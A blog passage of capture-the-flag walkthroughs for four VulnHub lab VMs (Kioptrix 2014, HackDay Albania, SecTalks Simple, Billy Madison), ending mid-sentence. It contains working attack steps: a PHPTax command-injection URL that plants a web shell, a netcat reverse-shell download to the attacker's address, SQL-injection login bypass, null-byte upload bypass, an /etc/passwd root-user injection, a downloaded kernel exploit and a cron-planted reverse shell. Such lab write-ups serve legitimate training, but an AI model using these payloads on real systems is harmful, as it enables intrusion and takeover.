[VULNHUB] Kioptrix: 2014 (#5)

This VM it’s the first of my OSCP series. In fact these VMs are similar to the OSCP ones for difficulty. Let’s start!

DIRECTORY TRAVERSAL IS YOUR FRIEND

Always start with an nmap scan:

nmap 192.168.1.21 -sV

This is what I got:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-23 09:55 CET
Nmap scan report for 192.168.1.21
Host is up (0.0052s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

There is a closed SSH service and two HTTP web servers. I tried to do some research with nikto:

nikto -h 192.168.1.21 -p 80

The output is the same as the port 8080:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2016-11-23 09:57:14 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 18:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2016-11-23 09:58:58 (GMT1) (104 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Wow! Seems to be vulnerable to a buffer overflow which allow remote code execution. I tried to do some research, I found the exploit but it didn’t work because the Apache and OS version were up to date. So I browsed to http://192.168.1.21 and there was just an “It works” string. Checking the source code of the HTML page I found a comment with an URL:

URL=pChart2.1.3/index.php

There is a pChart2.1.3 directory. I opened it and the index of the platform appeared. After some reasearch I found this vulnerabilities. Directory traversal seems to be interesting. I browsed to http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd and the file was printed to my screen. I thought that could be the attack vector. Now I browsed to http://192.168.1.21:8080 but I got Error 403: Forbidden. I returned to the previous website and I checked the FreeBSD Apache configuration file: http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf. This is the relevant part:

Allow from env=Mozilla4_browser

That’s why I can’t access to the port 8080, I need a Mozilla4_browser User-Agent.

SHELL THE WEB

So I fired up Burpsuite, I activated the proxy without interception and I changed the User Agent simulating Internet Explorer. Now I can access the port 8080 and I discovered the directory listing was active with only a single directory which was phptax. Now I am into the PHPTAX index. Again I researched for vulnerabilities and I found a remote code execution. I can use the Metasploit module but let’s try an hard way. I used this one. The netcat didn’t work so I created a PHP shell with that:

http://192.168.1.21:8080/phptax/index.php?pfilez=xxx;echo %22%3C%3Fphp system(\$_GET['cmd']); %3F%3E%22 > shell.php&pdf=make

Now navigating to http://192.168.1.21:8080/phptax/shell.php?cmd=ls I can view the files. Now I used the pentestmonkey PHP reverse shell. First of all I started listening with netcat:

nc -lvp 1234 < php_reverse_shell.php

Now I executed that on the browser:

http://192.168.1.21:8080/phptax/shell.php?cmd=nc 192.168.1.12 1234 > reverse_shell.php &

I checked the download with the ls command. Then I started listening again with netcat:

nc -lvp 1234

Then I browsed to http://192.168.1.21:8080/phptax/reverse_shell.php and then I got a shell into my terminal without TTY. I tried to escape from the limited shell but there weren’t ways to achieve that. So I continued with the limited one.

YOU HAD TO UPDATE YOU FREEBSD VERSION MATE

Now I need to escalate my privileges. I checked the kernel version:

uname -a

The output is:

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Ok, so I need to search for FreeBSD 9.0 privilege escalation and I found an interesting exploit. I downloaded the .c file locally and I transfered it via netcat into the /tmp folder. Then I ran it:

gcc exploit.c -o exploit
chmod +x exploit
./exploit

Now I checked that I was root with the id command and I browsed to /root directory. Now I listed the file and I opened the congrats.txt file:

If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)
Advertisements
[VULNHUB] Kioptrix: 2014 (#5)

[VULNHUB] HackDay: Albania

The HackDay: Albania is a really interesting VM where I lernt a few new things about SQLi and PHP.

TOO MUCH DIRECTORIES

First of all scan the available ports of the target:

nmap 192.168.1.19 -sV -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-21 09:24 CET
Nmap scan report for 192.168.1.19
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds

So there is an SSH service and an HTTP one.
Before browsing to http://192.168.1.19:8008 let’s grab some infos from nikto:

nikto -h 192.168.1.19 -p 8008

I discovered that there are lot of entries into /robots.txt file so I opened it:

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Opening a few of them will appear the same image which says that it is not the correct directory. So I used curl with a for to discover which folder was correct. First of all I created a .txt file with folder names one per line without slashes then I created a script:

IFS=$'\n'       
for j in $(cat list.txt)
do
    printf "Testing $j folder...\n\n"
    curl -L http://192.168.1.19:8008/$j
    printf "\n\n"
done

On the terminal output I found a different HTML source code:

Testing unisxcudkqjydw folder...

IS there any /vulnbank/ in there ???

BINGO!

THIS BANK IS NOT SO SECURE

Browse to http://192.168.1.19/unisxcudkqjydw/vulnbank and I discovered that directory listing is active and there is only a folder (client) so I clicked on it and Very Secure Bank website appeared. There is a login form, I tried some SQLi techniques, so I putted a single quote char and an error occurred:

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

Ok, seems to be vulnerable to SQLi. Now I spent lot of time finding the right pattern, I tried OR, AND, UNION without success. After some hours the idea, I used the comment to ignore the rest of the query like this:

user' #

I used the # because — comment returns an error while with the # I got only “Invalid Credentials…”. Now I bruteforced the username with Burpsuite. I captured the POST request and I used Intruder to achieve that with the following payload:

POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1
Host: 192.168.1.19:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.19:8008/unisxcudkqjydw/vulnbank/client/login.php
Cookie: PHPSESSID=cfg95pqu6gukj980niqriu7uq0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=§user§' #&password=something

I used rockyou as wordlist ans after some time I discovered that jeff’ # worked. I logged with this string into the username field and the bank homepage of the user appeared. THere is an upload form for tickets where I can upload images. First of all I tried with a .gif but the page returned an error:

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

So I tried with a .php%00.jpg using null byte and the image was succesfully uploaded. I clicked on the last ticket created and then on the image blank thumb but an error occurred:

Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13

There is an include error, maybe there is an include function into the PHP code? If that is true I can upload a simple .jpg file with the php code inside and it will even interpreted as PHP. Let’s try. I used this reverse shell. The upload was successful: I started listen locally:

nc -lvp 1234

Then I opened the last ticket again and I got the reverse shell!

PAY ATTENTION TO SENSITIVE FILES, DEAR SYSADMIN

Now I need a TTY but python seems to be not installed but before I surrender let’s do some research:

find / -name "python*" 2>/dev/null

I found that there is python3 into /usr/bin/ folder, so I typed:

/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

Now I have a TTY. I need to escalate privileges now. I found only an user into /home folder but is useless then I tried to search some files with bad permissions:

find / -writable -type f 2>/dev/null

And the first result was /etc/passwd file! So I copied the content locally and now I can add a new user. I need to generate an hashed password too because the new security policy of Linux doesn’t allow an user without a password:

openssl passwd -1

I used “test” as password and now I can add a new line into the passwd file:

test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Notice that I setted UID and GID to 0. Now I saved the file and I encoded it in base64:

cat passwd | base64 -w 0

Now I copied the base64 string and I typed this into the reverse shell:

echo "BASE64_STRING" | base64 -d > /etc/passwd

I omitted the base64 string because it was so long. Now verify that the file was overwritten:

cat /etc/passwd

This is the output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Now just log as test user:

su - test

And now we are logged in as root! List the file and you will find the flag:

cat flag.txt

Finished!

CONCLUSION

This is the source code of config.php, in particular focus on these strings:

function check_login($username,$password){
    
    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1) {
    return $result;
    } else {
        return -1;
    }   
}

The strings OR, UNION, AND are filtered on the username field while the single quote is filtered in the password field. That’s why we used user’ # string. Also check out the view_file.php:

$klient_id = $_SESSION["id"];
$filename = $_GET["filename"];
if(endsWith($filename , ".jpg") || endsWith($filename , ".png") || endsWith($filename , ".jpeg") || endsWith($filename , ".bmp")) {
    include("upload/" . $_GET["filename"]);
    } else {
        echo "Only images are allowed to get included. We hate hackers.";
    }
}

This code checks only if the extension is .jpg, .png or .jpeg, if that is true it includes the file and execute it even if it has not .php extension.

[VULNHUB] HackDay: Albania

[VULNHUB] SecTalks: BNE0x03 – Simple

This VM it’s a really easy boot2root challenge. I pwned it in 5 minutes, let’s start!

PART ONE

I scanned all available services with nmap:

nmap 192.168.1.20 -sV

The output is:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-15 19:09 CEST
Nmap scan report for 192.168.1.20
Host is up (0.0021s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds

So there is only a website here. I opened it and I have a login form in front of me. The server is running CuteNews v.2.0.3 and after some research I found an arbitrary file upload vulnerability here. So I just registered a new user (testuser in this case) and I logged in. Then I clicked on “Personal Options”. Now I started Burp Suite and I activated the proxy interception. Then I downloaded this shell and I edited the first 2 lines with my local IP and listening port. Then i renamed it with a .jpg extension and I clicked “Browse…”, I selected the file and I pressed “Save Changes”. Now I edited the POST request into Burp Suite changing the extension to .php, I forwarded the request and the file was uploaded! Now I started listen locally:

nc -lvp 1234

Now I browsed to http://192.168.1.20/uploads/avatar_testuser_php-reverse-shell.php and I got the reverse shell without TTY. To achieve this I just used python:

python -c 'import pty; pty.spawn("/bin/bash")'

PART TWO

Now I need to escalate privileges. I started checking the kernel version:

uname -a

The output is:

Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

I checked online the kernel version and I discoverd that it was vulnerable to overlayfs exploit. So I browsed to /tmp and I typed:

wget "https://www.kernel-exploits.com/media/ofs_32"

Then I gave it execution permissions:

chmod +x ofs_32

And now I just executed it:

./ofs_32

I got a shell as root! I res-spawned a TTY shell with python and I browsed to /root and I listed files and I found flag.txt. I just opened it:

U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!

The VM is rooted and completed!

[VULNHUB] SecTalks: BNE0x03 – Simple

[VULNHUB] Billy Madison: 1.1

Billy Madison it’s a boot2root VM inspired by the homonym film. Our goal is to root the machine and decrypt BIlly’s 12th grade final project. Let’s start!

PART ONE

Start with an nmap scan:

nmap 192.168.1.17 -sV

The output:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 17:38 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00045s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   closed telnet
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2525/tcp open   smtp

First of all I tried to browse to the HTTP website but there were nothing interesting, so I tried to connect to ssh:

ssh 192.168.1.17

But I got an error:

ssh_exchange_identification: Connection closed by remote host

Mmmmh, there are 2 services to analyze, telnet and smb. I choosed the second one because telnet port was closed:

smbclient -L 192.168.1.17

When it prompts for a password I used a random one. Now I got an interesting output:

WARNING: The "syslog" option is deprecated
Enter cristiano's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Sharename       Type      Comment
    ---------       ----      -------
    EricsSecretStuff Disk      
    IPC$            IPC       IPC Service (BM)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Server               Comment
    ---------            -------
    BM                   BM

    Workgroup            Master
    ---------            -------
    WORKGROUP            

There is a sharename folder (/EricsSecretStuff) and I can try to open it:

smbclient \\\\192.168.1.17\\EricsSecretStuff

Now I got an smb shell and listing files i found ebd.txt. Open it with gedit:

gedit smb://192.168.1.17/EricsSecretStuff/ebd.txt

Again, choose a random password when it prompts. The content of the file is:

Erics backdoor is currently CLOSED

So I discovered that there is an SSH backdoor in the system but at the moment is closed. I finished analyzing the smb service, now I can switch to telnet:

telnet 192.168.1.17

This is the output:

Trying 192.168.1.17...
Connected to 192.168.1.17.
Escape character is '^]'.


***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

Connection closed by foreign host.

Paying attention to the message i noticed the upper-case string ROT near rkfpuzrahngvat, which is an old cypher (an example is Caesar Cipher). I tried the worst one, the ROT13 (Google it if you want know why) because “I don’t use ROTten passwords”. So i pasted rkfpuzrahngvat here and the decrypted string is:

exschmenuating

What can I do with that string? After some minutes I tried to browse to http://192.168.1.17/exschmenuating and a new page appears. The interesting part is:

OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine! 

Now I know that there is a .cap file into this folder which its name contains “veronica”, also she uses her name as part of her password. An hint to brute force the file name is “she rocks!” which reminded me to rockyou.txt wordlist. So I created a new wordlist from rockyou.txt with passwords which contains “veronica”:

cat rockyou.txt | grep veronica > veronica.txt

Now I used BurpSuite Intruder to bruteforce the filename with the following payload:

GET /exschmenuating/§var§.cap HTTP/1.1
Host: 192.168.1.17
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0

I loaded veronica.txt dictionary and after some seconds I got the filename: 012987veronica.cap. I downloaded it and opened with wireshark. Analyzing it I discovered that it was a mail conversation between Veronica and Eric. The first mail is:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just click here to install it, k?  

Thanks. -Eric


.
QUIT

The second one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

-VV . QUIT

The third one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

.
QUIT

The fourth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

.
QUIT

The fifth one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric


.
QUIT

The sixth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V


.
QUIT

That’s all and it’s clear that Veronica installed the virus into the PC uploaded into FTP server by Eric. I found some interesting information from these mails. The first one is that I need to port knock some ports to open the FTP one and Eric’s account credentials are eric:ericdoesntdrinkhisownpee. So I opened the YouTube video linked into the second mail and I wrote the “Spanish Armada combo”, then I ran this command:

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -T5 -p $x 192.168.1.17; done;

Now I tried to login into FTP:

ftp 192.168.1.17

A login prompt appeared and I typed the Eric’s credentials, now I am logged in.

PART TWO

Listing files I found a .notes and other random things. So I download the file:

get .notes

Now open it, this is the content:

Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

I discovered that to activate the SSH backdoor I need to send an email with a specific content but I need password too which is into Veronica’s FTP folder. First of all open the YouTube video and complete the sentence: My kid will be a soccer player. Now I can brute force the FTP credentials of Veronica:

medusa -h 192.168.1.17 -u veronica -P veronica.txt -M ftp

After a minute I got the credentials:

ACCOUNT FOUND: [ftp] Host: 192.168.1.17 User: veronica Password: babygirl_veronica07@yahoo.com [SUCCESS]

Now I can login to Veronica’s account. I found two file, the first one is < .cap file and the second one is an email. Download them but remember to activate binary mode first:

binary
get eg-01.cap
get email-from-billy.eml

This is the email content:

        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,

Billy

Then I opened the -cap file and I noticed that it was a capture file of the Eric Wi-Fi handshake. So I launched the command:

aircrack.ng -w rockyou.txt eg-01.cap

After some minutes I cracked the Wi-Fi password: triscuit*. Now I have SSH credentials but I need to activate a backdoor sending an email. If you remember the first nmap scan there is an smtp service running on the port 2525, so I can telnet to it and send an email from there:

telnet 192.168.1.17 2525

Now I am logged into the smtp service and now I can send the email. I use Veronica and Eric emails found on the first .cap file:

EHLO kali
MAIL FROM:eric@madisonhotels.com
RCPT TO:vvaughn@polyfector.edu
DATA
My kid will be a soccer player
.
QUIT

Now I performed another nmap to see which port I opened:

nmap 192.168.1.17

And I discovered that the backdoor was on port 1974:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 18:57 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00037s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   closed telnet
80/tcp   open   http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds
MAC Address: 00:0C:29:A0:57:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.81 seconds

So I connect to SSH backdoor with eric:triscuit*:

ssh eric@192.168.1.17 -p 1974

Now I am logged in.

PART THREE

If you want know why the backdoor port was 1974 just:

cat why-1974.txt

Now I need to become root and decrypt the file, so I need some privilege escalation techniques:

find / -perm -2000 -type f 2>/dev/null

I noticed /usr/local/share/sgml/donpcgd which it’s a very uncommon file. I tried to google it without success. Then I remember the Eric’s note which said

"To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards.

The backwards word was the hint, so I googled “dgcpnod” and I found this page: https://blogs.akamai.com/2016/01/delegate-v9913-setuid-binary-vulnerability.html. There is a PoC of the exploit so I followed it with some modifications:

cd /usr/local/share/sgml
touch /tmp/rootme
chmod 755 /tmp/rootme
./donpcgd /tmp/rootme /etc/cron.hourly/rootme
echo '#!/bin/bash' > /etc/cron.hourly/rootme
echo 'mknod /tmp/backpipe p; /bin/bash 0/tmp/backpipe' >> /etc/cron.hourly/rootme

It’s time to listen for a shell locally:

nc -lvp 1234

Now wait one hour and you will get a shell as root! Use Python to get a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I noticed the folder /PRIVATE so I browsed into it and I found two files: BowelMovement and hint.txt. This is the content of the .txt file:

Heh, I called the file BowelMovement because it has the same initials as Billy Madison. That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

